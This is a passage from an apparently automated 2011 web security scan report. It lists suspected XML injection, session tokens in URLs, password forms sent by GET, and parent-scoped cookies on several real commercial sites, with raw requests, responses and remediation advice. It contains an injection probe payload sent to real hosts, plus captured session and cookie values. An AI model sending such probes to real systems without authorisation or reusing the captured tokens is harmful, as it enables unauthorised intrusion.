Date: Mon, 18 Jul 2011 02:19:17 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.6. http://mt2.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt2.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt2.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:22 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 1
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.7. http://mt3.gmaptiles.co.kr/mt/v=kr1.14/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt3.gmaptiles.co.kr
Path:   /mt/v=kr1.14/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1.14/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt3.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:15 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

6.8. http://mt3.gmaptiles.co.kr/mt/v=kr1p.12/x26hl=en/x26src=api/x26 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://mt3.gmaptiles.co.kr
Path:   /mt/v=kr1p.12/x26hl=en/x26src=api/x26

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /mt]]>>/v=kr1p.12/x26hl=en/x26src=api/x26 HTTP/1.1
Host: mt3.gmaptiles.co.kr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:19:11 GMT
Content-Type: text/html
Content-Length: 345
Access-Control-Allow-Origin: *
Cache-Control: max-age=31536000
Age: 0
Connection: close

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7. Session token in URL  previous  next
There are 5 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://simplexityllc.tt.omtrdc.net
Path:   /m2/simplexityllc/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/simplexityllc/mbox/standard?mboxHost=phones.microsoftstore.com&mboxSession=1310993867366-231308&mboxPage=1310993867366-231308&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxCount=1&referringdomain=microsoft&refcode1=&refcode2=&eid=&agent=&zipcode=98001&oflag=specialoffer&mbox=phoneFinder_phones_filter_phones&mboxId=0&mboxTime=1310975882554&mboxURL=http%3A%2F%2Fphones.microsoftstore.com%2FeCommerce%2FSpecialOffer.aspx%3Fcid%3D36173_98658c3dff8d4f2da6bfa1b480f50ef7&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: simplexityllc.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx?cid=36173_98658c3dff8d4f2da6bfa1b480f50ef7

Response

HTTP/1.1 200 OK
Content-Length: 113
Date: Mon, 18 Jul 2011 12:57:55 GMT
Server: Test & Target

mboxFactories.get('default').get('phoneFinder_phones_filter_phones',0).setOffer(new mboxOfferDefault()).loaded();

7.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1310993870949-319721&mboxPC=1310569554435-90226.17&mboxPage=1310993870949-319721&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=1&loggedin=false&mbox=VZW_Global_Header&mboxId=0&mboxTime=1310975870964&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fstore%2Fcontroller%3F%26item%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=39 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: mboxPC=1310569554435-90226.17

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1310569554435-90226.17; Domain=verizonwireless.tt.omtrdc.net; Expires=Mon, 01-Aug-2011 12:57:47 GMT; Path=/m2/verizonwireless
Content-Type: text/javascript
Content-Length: 1026
Date: Mon, 18 Jul 2011 12:57:46 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('VZW_Global_Header',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defaul
...[SNIP]...

7.3. http://wireless.amazon.com/HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://wireless.amazon.com
Path:   /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /HTC-Trophy-Windows-Verizon-Wireless/dp/B00528E2JU/ref=sh_br_ph_1?ie=UTF8&transaction=INDIVIDUAL_NEW HTTP/1.1
Host: wireless.amazon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx?id=1685&np=1569-1684-1536-1537-1538-1568-1690-1685&WT.mpe=oHP-car

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 12:57:36 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=179-9570509-7108862; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 12:57:36 GMT; Path=/
Content-Length: 111404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
   <title>Ama
...[SNIP]...
<span id="popup_path">
<a href="/redirect/ref=cr_page_write_review?ie=UTF8&location=http%3A%2F%2Fwww.amazon.com%2Freview%2Fcreate-review%3Fasin%3DB00528E2JU&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83">
<input type="image" src="http://g-ecx.images-amazon.com/images/G/01/Aloha/en_US/inca/buttons/create-review-btn-1586590642._V174067908_.gif" height="22" width="157" border="0" />
...[SNIP]...

7.4. http://www.bestbuy.com/site/olspage.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bestbuy.com
Path:   /site/olspage.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /site/olspage.jsp;jsessionid=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28?id=pcat17408&width=400&skuID=2330093&isCntrctSelect=false&productId=1218323066904&contractDesc=&TB_iframe=true&isDevicePDP=true&type=page&documentType=mobile&parentPage=PDP&modal=true&keepThis=true&height=250 HTTP/1.1
Host: www.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/HTC+-+Trophy+Mobile+Phone+-+Black+(Verizon+Wireless)/2330093.p?id=1218323066904&skuId=2330093&st=htc%20trophy&cp=1&lp=1&contract_desc=
Cookie: TLTSID=84D0DE5AB13D10B1A8788827D0E141DC; akaau=1310995660~id=1ba8cb2e676cea6446c2d3ded776fcfc; mobileab=b; newgroup3=b; newgroup2=b; newgroup=a; group2=a; group=c; DYN_USER_CONFIRM=1304deff50b793ec00235e3b0413fa91; DYN_USER_ID=ATG12562361841; JSESSIONID=389450CC5B435E7E6961192C7DB2C725.bbolsp-app05-28; TLTUID=84D0DE5AB13D10B1A8788827D0E141DC; fsr.a=1310993883922

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
X-Powered-By:
Vary: Accept-Encoding
Expires: Mon, 18 Jul 2011 12:57:58 GMT
Pragma: no-cache
Date: Mon, 18 Jul 2011 12:57:58 GMT
Content-Length: 4044
Connection: close
Cache-Control: no-store

<!DOCTYPE html>
<!-- B:226 -->
<!-- B:005 -->
<!-- bbolsp-app05/dlpolsapp28-40-11-6 -->
<!-- E:005 -->
<!-- B:0OD -->
<!-- B:185 -->
<script type="text/javascript" language="javascript">
document.doma
...[SNIP]...

7.5. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=131551933524460&app_id=131551933524460&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbc6876fe3cf96%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df347e2456f94ef%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e64f41ed3eee2%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29c11306e746b8%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11952281f410d%26origin%3Dhttp%253A%252F%252Fwww.verizonwireless.com%252Ff375df477b7f832%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa856743944b9c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.183.31
X-Cnection: close
Date: Mon, 18 Jul 2011 13:01:38 GMT
Content-Length: 278

<script type="text/javascript">
parent.postMessage("cb=f29c11306e746b8&origin=http\u00253A\u00252F\u00252Fwww.verizonwireless.com\u00252Ff375df477b7f832&relation=parent&transport=postmessage&frame=fa8
...[SNIP]...

8. Password field submitted using GET method  previous  next
There are 3 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


8.1. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-domaintools-binoculars-contest-winners/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /2011/06/fun-friday-domaintools-binoculars-contest-winners/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=fd758ee59d9a85339151894b66241298; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2037>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

8.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-win-these-domaintools-binoculars/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /2011/06/fun-friday-win-these-domaintools-binoculars/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=f9707fa0e69cbe5286747625fb5c8a87; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2001>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

8.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blog.domaintools.com
Path:   /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:04 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=534894b03dca4c10b8fdad94d3f3915b; expires=Tue, 19 Jul 2011 02:16:04 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2057>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</h3>
               <form id="loginform22" action="#" onsubmit="validateUser(); return false;" class="commentform">
                   
                   <p id="invalidpw" style="display: none; color: red;font-weight:bold">
...[SNIP]...
<br />
                       <input type="password" id="author" name="password" style="width: 200px;" class="styled" size="22" tabindex="1" />
                       <br />
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 20 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://blog.domaintools.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=b56d089b9b5d752fed33fda40c6cb1b5; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 119306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.2. http://blog.domaintools.com/2011/06/fun-friday-domaintools-binoculars-contest-winners/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-domaintools-binoculars-contest-winners/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/06/fun-friday-domaintools-binoculars-contest-winners/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=fd758ee59d9a85339151894b66241298; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2037>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.3. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /2011/06/fun-friday-win-these-domaintools-binoculars/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/06/fun-friday-win-these-domaintools-binoculars/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:06 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=f9707fa0e69cbe5286747625fb5c8a87; expires=Tue, 19 Jul 2011 02:16:06 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2001>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.4. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blog.domaintools.com
Path:   /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/07/you-asked-we-delivered-introducing-the-domaintools-api/ HTTP/1.1
Host: blog.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:04 GMT
Server: Apache/2.2.9 (FreeBSD) mod_ssl/2.2.9 OpenSSL/0.9.8e DAV/2 PHP/5.2.6 with Suhosin-Patch
X-Powered-By: PHP/5.2.6
Set-Cookie: dtblogsession=534894b03dca4c10b8fdad94d3f3915b; expires=Tue, 19 Jul 2011 02:16:04 GMT; path=/; domain=.domaintools.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://blog.domaintools.com/xmlrpc.php
Link: <http://blog.domaintools.com/?p=2057>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...

9.5. http://cts-log.channelintelligence.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cts-log.channelintelligence.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?vid=11303&eid=13&tid=null&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1
